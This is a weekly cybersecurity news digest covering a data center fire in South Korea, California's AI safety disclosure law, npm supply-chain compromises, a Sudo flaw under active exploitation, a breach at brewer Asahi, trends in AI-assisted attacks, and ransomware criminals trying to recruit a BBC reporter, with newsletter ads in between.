⏱️ ≈ 7-minute read
Editor’s Note: From AI laws forcing Big Tech into sunlight to breweries choking on ransomware foam, this week is a grab bag of cyber chaos. Our picks include physical disasters with digital fallout, state-level AI regulation, and one ransomware gang that decided to pitch a BBC journalist on a “side hustle.”

📬 This Week’s Clickables
📌 Big News – South Korea 🔥 data center fire sparks cyber fears; California 📜 forces AI firms into daylight
🚨 Can’t Miss – CISA 🚨 sounds alarm on Sudo; GoAnywhere 💥 exploited; npm 📦 chaos; crypto 🪙 theft; beer 🍺 meets breach
🤖 AI in Cyber – Defense ⚔️ vs. defense; agentic AI 🤖; AI-phishing 🎣 mashups; weaponized generative models 🧨
🧪 Strange Cyber Story – Hackers 🕵️ tried to recruit a BBC journalist with ransomware profit-sharing
🚨 Big Stories
🔥 South Korea raises cyber threat level after data center fire cripples gov infrastructure
Intro: A literal firestorm in South Korea just created a national cyber headache.
What Happened: A fire tore through the National Information Resources Service data center in Daejeon, disrupting core government services—email, banking, ID systems, and real estate transactions. The National Intelligence Service responded by raising the country’s cyber threat level to “caution,” worried attackers could exploit the chaos.
Why It’s Important: When physical infrastructure collapses, the digital attack surface widens. Opportunistic threat actors thrive on confusion, and South Korea just gave them a buffet.
The Other Side: It’s not yet clear whether hackers are actually exploiting the outage, or if the fears are purely precautionary. The NIS may be playing it safe, signaling to both adversaries and the public that vigilance is high.
Takeaway: A cyber crisis doesn’t always start in cyberspace. Fires, floods, and power outages can ripple into critical IT infrastructure and weaken national defenses.
TL;DR: If your country’s data center goes up in flames, are your cyber defenses built to withstand opportunistic attacks—or just wishful thinking?
Further Reading: The Guardian
“It takes 20 years to build a reputation and a few minutes of cyber-incident to ruin it.” — Stéphane Nappo
What Smart Investors Read Before the Bell Rings
In a world of clickbait headlines and empty hot takes, The Daily Upside delivers what really matters. Written by former bankers and veteran journalists, it brings sharp, actionable insights on markets, business, and the economy — the stories that actually move money and shape decisions.
That’s why over 1 million readers, including CFOs, portfolio managers, and executives from Wall Street to Main Street, rely on The Daily Upside to cut through the noise.
No fluff. No filler. Just clarity that helps you stay ahead.
📜 California enacts AI safety law forcing disclosure of safety protocols, incidents
Intro: California is taking the AI gloves off—forcing Big Tech to spill some security secrets.
What Happened: Governor Gavin Newsom signed Senate Bill 53, requiring major AI firms to publish redacted versions of their safety and security protocols, report major AI-related incidents within 15 days, and protect whistleblowers.
Why It’s Important: This is one of the most aggressive state-level AI oversight laws to date, shifting accountability from corporate secrecy to public disclosure. It could become a template for other states—or even federal regulation.
The Other Side: Critics argue forced disclosure could give adversaries a roadmap to exploit weaknesses. AI firms will likely fight back, claiming compliance undermines competitive advantage and intellectual property.
Takeaway: Transparency is now law—at least in California. Companies can no longer bury AI security failures in internal reports.
TL;DR: When state governments regulate AI security before Washington does, are we looking at a patchwork of standards—or the start of national policy?
Further Reading: Le Monde
🔥 Can’t Miss
🚨 CISA adds critical Sudo flaw to KEV amid active exploitation
CISA added a newly discovered Linux/Unix Sudo vulnerability to its Known Exploited Vulnerabilities catalog, confirming attackers are already taking advantage of it.
👉️ Patch or be pwned—the open-source backbone of countless systems is again a target.📦 Fake Postmark npm package secretly exfiltrated emails
A malicious npm package, disguised as Postmark MCP, quietly BCC’d outbound emails to attacker-controlled inboxes. One line of code, big supply-chain headache.
👉️ Sometimes a single character in your dependency tree = breach.🪙 JavaScript packages with billions of downloads compromised to steal crypto
Attackers compromised 18 npm packages (totaling over 2 billion downloads/week) with crypto-stealing malware. The breach reportedly began with a phishing email.
👉️ The world’s largest supply chain hack? Quite possibly.🍺 Cyberattack on Asahi disrupts production in Japan
Beer giant Asahi saw operations disrupted, affecting production lines and call centers. Attackers haven’t been identified, but ransomware is the likely culprit.
👉️ Even breweries need incident response plans—malware doesn’t care if you’re making Excel sheets or lagers.
Go from AI overwhelmed to AI savvy professional
AI will eliminate 300 million jobs in the next 5 years.
Yours doesn't have to be one of them.
Here's how to future-proof your career:
Join the Superhuman AI newsletter - read by 1M+ professionals
Learn AI skills in 3 mins a day
Become the AI expert on your team
🤖 AI in Cyber
⚔️ Fight AI-powered attacks with AI, say intel leaders
The NGA and Pentagon are urging the use of AI tools to counter AI threats—but remind defenders not to abandon “boring old” automation and fundamentals.
👉️ New AI doesn’t replace old playbooks—it complements them.🤖 Agentic AI: cybersecurity’s friend or foe?
TechRadar digs into agentic AI—autonomous AI systems that act on their own—and how they could reshape both cyberattacks and defenses.
👉️ The scariest part? They might innovate faster than defenders.🎣 New malware campaigns blend phishing with AI-driven payloads
Campaigns like MostereRAT and ClickFix show how attackers are layering AI-assisted phishing with RAT malware.
👉️ Expect fewer typo-ridden phish—and more convincing traps.🧨 Generative AI weaponization accelerates advanced attacks
A new report highlights how generative AI is being used in increasingly sophisticated cyberattacks, from deepfakes to automated exploit writing.
👉️ AI is no longer “emerging” in attacks—it’s embedded.
🧟♂️ Strange Cyber
🕵️ BBC reporter offered a cut of ransom to help hackers
Intro: Some journalists get pitched on book deals. BBC’s Joe Tidy got pitched on a ransomware side hustle.
What Happened: A threat actor claiming to represent the Medusa ransomware gang reached out to Tidy with a bold offer: 15–25% of ransom payouts if he’d let them use his BBC-issued laptop as an entry point into corporate targets. Tidy, naturally, declined.
Why It’s Important: This marks a strange evolution in social engineering—threat actors aren’t just phishing CFOs, they’re trying to recruit reporters to help them gain credibility and access.
The Other Side: While Tidy went public, it’s impossible to know how many others might have received similar offers—and whether anyone took the bait.
Takeaway: Cybercriminals are professionalizing recruitment—if ransomware gangs are cold-calling journalists, executives should assume their employees may get similar pitches.
TL;DR: If ransomware groups are recruiting journalists, how long before they start poaching insiders in your organization?
Further Reading: The Times
Thanks for reading this week’s edition. Like what you see? Forward it!
Hate everything you see or have other feedback? Reply back to this email!